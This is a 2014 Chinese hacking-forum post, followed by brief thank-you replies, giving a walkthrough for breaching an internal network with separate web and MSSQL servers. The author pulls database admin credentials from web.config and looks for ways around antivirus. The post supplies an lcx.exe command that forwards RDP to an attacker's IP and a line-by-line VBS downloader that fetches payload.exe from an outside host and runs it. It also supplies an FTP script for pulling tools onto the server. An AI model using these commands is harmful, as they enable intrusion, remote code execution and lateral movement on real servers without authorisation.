MSSQL站库分离情况的渗透思路

幽暗 · 发表于 2014-10-13 20:21:23

1. 服务器属内网环境，站库分离，通过web.config找到数据库服务库SA帐号密码，成功添加用户(192.168.0.206) 。
2. Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件，不能转lcx.exe工具转发。
3. 测试过其它的转发工具，要么被查杀，要么无法用，使用reDuh工具只能转发当前IP的，而且速度极慢，受不了0.0 。
4. 使用msfpayload生成的exe文件也被查杀，由于服务器是x64的，msfencode没有x64的编码器，所以没能反弹成功。

思路1：关闭杀软，通过以下提供的命令下载文件（未测试）
思路2：使用msf aspx反弹，然后进行转发及跨路由渗透（已成功）

正常思路：如果没有杀软，直接传lcx.exe到192.168.0.203上，然后使用以下命令转发192.168.0.206：
c:\lcx.exe -slave 你的外网IP 51 192.168.0.206 3389 // 看了这个后，你们应该都懂的吧 0.0 。

DOS命令：（一条一条执行）
01.echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
02.echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
03.echo Post.Open "GET","http://bbs.blackbap.org/payload.exe",0 >>xxx.vbs
04.echo Post.Send() >>xxx.vbs
05.echo Set aGet = CreateObject("ADODB.Stream") >>xxxc.vbs
06.echo aGet.Mode = 3 >>xxx.vbs
07.echo aGet.Type = 1 >>xxx.vbs
08.echo aGet.Open() >>xxx.vbs
09.echo aGet.Write(Post.responseBody) >>xxx.vbs
10.echo aGet.SaveToFile "c:\xxxc.exe",2 >>xxx.vbs
11.echo wscript.sleep 1000 >>xxxc.vbs
12.echo Shell.Run ("c:\xxx.exe") >>xxx.vbs

01.echo open 127.0.0.1>c:\ftp.dat
02.echo admin>>c:\ftp.dat
03.echo admin>>c:\ftp.dat
04.echo binary>>c:\ftp.dat
05.echo get lcx.exe>>c:\ftp.dat
06.echo bye>>c:\ftp.dat
07.ftp -s:c:\ftp.dat

游客，如果您要查看本帖隐藏内容请回复

好东西就得分享，哈哈!

Whysec · 发表于 2014-10-13 21:08:57

感谢分享

fl0at · 发表于 2014-10-14 00:53:50

感谢分享!

liy72093032 · 发表于 2014-10-14 09:06:11

好把多谢分享~

C4r1st · 发表于 2014-10-14 09:43:26

内网大数据脱裤我是知道，

ztaosony · 发表于 2014-10-14 10:07:45

来看看什么好东西

a13775647904 · 发表于 2014-10-14 10:29:49

来看看什么好东西

东风谷早苗 · 发表于 2014-10-14 12:36:01

感谢分享

2119 · 发表于 2014-10-14 14:22:30

谢谢分享

竹林听风 · 发表于 2014-10-14 15:54:10

先看看再说

MSSQL站库分离情况的渗透思路

点评

指导单位

旗下站点

联系我们